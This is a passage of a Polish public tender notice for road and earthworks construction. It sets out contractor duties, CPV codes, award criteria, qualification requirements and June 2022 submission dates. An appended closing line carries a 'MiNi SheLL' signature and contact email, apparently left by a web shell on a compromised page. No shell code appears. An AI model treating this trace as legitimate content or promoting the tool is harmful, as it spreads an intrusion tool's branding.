Inspektora nadzoru. Przystąpienie do sprawdzenia nastąpi nie później niż w ciągu 3 dni roboczych od daty powiadomienia. Jeżeli Wykonawca nie dokonał powiadomienia, o którym mowa powyżej zobowiązany jest odkryć roboty lub wykonać inne czynności niezbędne do zbadania robót, a następnie przywrócić roboty do stanu poprzedniego na własny koszt;<br/>h)	dostarczania Zamawiającemu / Inspektorowi nadzoru bez dodatkowego wzywania wszystkich wymaganych prawem atestów, certyfikatów i specyfikacji technicznych na zastosowane materiały, pod rygorem odmowy dokonania przez Zamawiającego odbioru robót wykonanych przez Wykonawcę;<br/>i)	umożliwiania wstępu na teren budowy pracownikom Państwowego Nadzoru Budowlanego, oraz innych uprawnionych osób, do których należy wykonanie zadań określonych przepisami prawa oraz do udostępnienia im danych i informacji wymaganych prawem, a dotyczących prowadzonych na budowie robót;<br/>j)	natychmiastowego wykonania robót zabezpieczających w przypadku groźby katastrofy budowlanej lub zniszczeń oraz niezwłocznego powiadomienia o tym fakcie Zamawiającego/ Inspektora nadzoru;<br/>k)	prowadzenia robót w sposób nie powodujący uszkodzeń infrastruktury naziemnej i podziemnej oraz mienia osób trzecich, a w przypadku powstania jakiejkolwiek szkody do jej naprawienia;<br/>l)	prowadzenia na bieżąco dziennika budowy;<br/>m)	przerwania prac na żądanie Zamawiającego i w związku z tym zabezpieczenia wykonanych robót przed ich zniszczeniem;<br/>n)	zapewnienia stosownej obsługi geodezyjnej realizowanych robót budowlanych oraz do odtworzenia punktów osnowy geodezyjnej w przypadku ich zniszczenia;<br/><br/>3) Jeżeli do wykonania przedmiotu zamówienia niezbędne będzie:<br/>a) wejście w teren lub korzystanie z innych nieruchomości lub obiektów osób trzecich, Wykonawca zobowiązany jest uzyskać stosowną zgodę ich właścicieli, uzgodnić zakres i terminy korzystania z nich oraz ponieść wszystkie koszty z tym związane;<br/>b) zajęcie pasa drogowego, Wykonawca zobowiązany jest uzyskać stosowną zgodę zarządcy drogi, opracować projekt tymczasowej organizacji ruchu na czas budowy oraz ponieść wszystkie koszty z tym związane.<br/>4) Roboty budowlane stanowiące przedmiot zamówienia Wykonawca wykona zgodnie z decyzją nr 601/2019 z dnia 31 lipca 2019 r. o zatwierdzeniu projektu budowlanego i udzieleniu pozwolenia na budowę oraz z materiałów własnych tj. wyrobów dopuszczonych do stosowania w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2021 r. poz. 2351 z późn. zm.) oraz ustawy z dnia 16 kwietnia 2004 r. o wyrobach budowlanych (Dz. U. z 2021 r. poz. 1213).<br/>5) Wykonawca na przedmiot umowy udziela gwarancji na okres nie krótszy niż 36 miesięcy licząc od daty dokonania bezusterkowego odbioru końcowego przedmiotu umowy.<br/>6) Rękojmia za wady przedmiotu umowy wynosi 60 miesięcy liczonych od daty dokonania bezusterkowego odbioru końcowego przedmiotu umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45232310-8 - Roboty budowlane w zakresie linii telefonicznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający udzieli zamówienia Wykonawcy, którego oferta:<br/>- odpowiada wszystkim wymaganiom przedstawionym w ustawie Pzp,<br/>- odpowiada wszystkim wymaganiom przedstawionym w SWZ,<br/>- została uznana za najkorzystniejszą w oparciu o podane kryteria wyboru.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> . O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1.1. spełniają warunki udziału w postepowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym<br/> Zamawiający nie określił warunku w powyższym zakresie,<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/> Zamawiający nie określił warunku w powyższym zakresie,<br/>3) sytuacji ekonomicznej lub finansowej<br/> Zamawiający nie określił warunku w powyższym zakresie,<br/>4) zdolności technicznej lub zawodowej.<br/>Zamawiający uzna, że warunek został spełniony, jeżeli Wykonawca:<br/>a)	załączy do oferty podpisane oświadczenie, o którym mowa w rozdziale XII ust. 3 pkt 3.1.a) SWZ (według Załącznika Nr 3 do SWZ oraz załącznika 3a do SWZ - jeżeli dotyczy) <br/>b)	wykaże się wykonaniem nie wcześniej niż w okresie ostatnich 5 lat liczonych wstecz od dnia w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co najmniej jednej roboty budowlanej :, <br/>•	dla Części I polegającej na budowie i/lub przebudowie i/lub remoncie dróg, o wartości wykonanej roboty co najmniej 200 000 PLN brutto. Poprzez pojęcie jednej roboty budowlanej należy rozumieć jedną umowę z Wykonawcą. Wartość roboty budowlanej to wartość umowy.<br/>•	dla Części II polegającej na budowie i/lub przebudowie i/lub remoncie dróg, o wartości wykonanej roboty co najmniej 100 000 PLN brutto. Poprzez pojęcie jednej roboty budowlanej należy rozumieć jedną umowę z Wykonawcą. Wartość roboty budowlanej to wartość umowy.<br/>•	dla Części IV polegającej na budowie i/lub przebudowie i/lub remoncie dróg, o wartości wykonanej roboty co najmniej 100 000 PLN brutto. Poprzez pojęcie jednej roboty budowlanej należy rozumieć jedną umowę z Wykonawcą. Wartość roboty budowlanej to wartość umowy.<br/>•	dla Części V polegającej na budowie i/lub przebudowie i/lub remoncie dróg, o wartości wykonanej roboty co najmniej 100 000 PLN brutto. Poprzez pojęcie jednej roboty budowlanej należy rozumieć jedną umowę z Wykonawcą. Wartość roboty budowlanej to wartość umowy. <br/>•	dla Części VI polegającej na budowie i/lub przebudowie i/lub remoncie dróg, o wartości wykonanej roboty co najmniej 100 000 PLN brutto. Poprzez pojęcie jednej roboty budowlanej należy rozumieć jedną umowę z Wykonawcą. Wartość roboty budowlanej to wartość umowy.<br/><br/> w przypadku składania oferty na więcej niż jedną część zamówienia, wykonawca musi wykazać się spełnieniem warunków dla tej części zamówienia, dla której zostały one ustalone na wyższym poziomie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.1.	Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie - nie krótszym niż 5 dni, od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień złożenia podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu, o których mowa w rozdziale VI pkt 1.1.4) SWZ:<br/> wykazu robót budowlanych, wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty. <br/> Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonywanych wspólnie z innymi wykonawcami, wykaz o którym mowa powyżej, dotyczy robót budowlanych, w których wykonaniu wykonawca ten bezpośrednio uczestniczył.<br/> Wykaz sporządza się według wzoru stanowiącego załącznik nr 11 do SWZ z uwzględnieniem warunków określonych przez Zamawiającego w rozdziale VI pkt 1.1.4 b) SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda złożenia przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 3.1.	Aktualne na dzień składania ofert :<br/>a)	oświadczenie o spełnianiu warunków udziału w postepowaniu składane na podstawie art. 125 ust. 1 Pzp. wg. Załącznika nr 3 do SWZ w zakresie wskazanym przez Zamawiającego w SWZ, składane pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym;<br/>b)	oświadczenie o niepodleganiu wykluczeniu składane na podstawie art. 125 ust. 1 Pzp. wg. Załącznika nr 4 do SWZ w zakresie wskazanym przez Zamawiającego w SWZ, składane pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej, podpisem zaufanym lub podpisem osobistym.<br/><br/>3.1.2. Oświadczenia, o których mowa pkt 3.1, stanowią dowód potwierdzający brak podstaw wykluczenia, spełnianie warunków udziału w postępowaniu na dzień składania ofert, tymczasowo zastępujący wymagane przez zamawiającego podmiotowe środki dowodowe.<br/>3.1.3. Wykonawca, w przypadku polegania na zdolnościach podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniami, o których mowa w pkt 3.1., także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby wg. Załączników Nr 3a i 4a do SWZ.<br/>3.1.4. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenia, o których mowa w pkt 3.1., składa każdy z Wykonawców. <br/> Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.2.	formularz oferty sporządzony według wzoru stanowiącego załącznik nr 2 do SWZ – złożony pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej, podpisem zaufanym lub podpisem osobistym,<br/>3.3.	jeżeli dotyczy - pełnomocnictwo osoby uprawnionej do złożenia oferty, złożone pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej, podpisem zaufanym lub podpisem osobistym;<br/>3.4.	jeżeli dotyczy – oświadczenie, o którym mowa w Rodz. VII ust 8 SWZ, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy składający ofertę wspólnie, podpisane podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym;<br/>3.5.	jeżeli dotyczy - zobowiązanie podmiotu udostępniającego zasoby o którym mowa w Rozdz. VII ust. 3 SWZ do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca, realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów - złożone pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej, podpisem zaufanym lub podpisem osobistym; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenia, o których mowa w pkt 3.1., składa każdy z Wykonawców. <br/> Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>8.	W przypadku wspólnego ubiegania się o zamówienie wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>9.	Jeżeli oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana, zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców.<br/>10.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia są zobowiązani do łącznego spełnienia takich samych warunków udziału w postępowaniu o udzielenie zamówienia, jak wykonawcy występujący samodzielnie tj.: przy ocenie spełnienia warunków, o których mowa w Rozdz. VI ust. 1.1.4).<br/>4.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, podmiotowe środki dowodowe, o których mowa w ust. 1 pkt 1.1. SWZ, składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/ą spełnienie warunków udziału w postepowaniu w zakresie i na zasadach opisanych w Rozdz. VI ust. 1 pkt 1.1. SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Na podstawie art. 455 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość dokonania zmian umowy w stosunku do treści oferty i na warunkach określonych w Rozdz. XXI SWZ i w projektowanych postanowieniach umowy stanowiących odpowiednio zał. nr 5, 6, 7 ,8, 9 i 10 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-10 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty” dostępnego na ePUAP i udostępnionego również na miniPortalu. Sposób złożenia oferty, w tym zaszyfrowanie oferty został opisany w „Instrukcji użytkownika” dostępnej na stronie https://miniportal.uzp.gov.pl/.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-10 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-09</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Maksymalny termin realizacji zamówienia dla części I, II, III, IV, V i VI : do 120 dni od dnia podpisania umowy.<br/><br/>2. Za termin wykonania przedmiotu zamówienia każdej z części zamówienia uznaje się dzień pisemnego zgłoszenia przez Wykonawcę Zamawiającemu gotowości do odbioru całego przedmiotu umowy, odpowiadającego wymaganiom Zamawiającego.

Creat By MiNi SheLL
Email: jattceo@gmail.com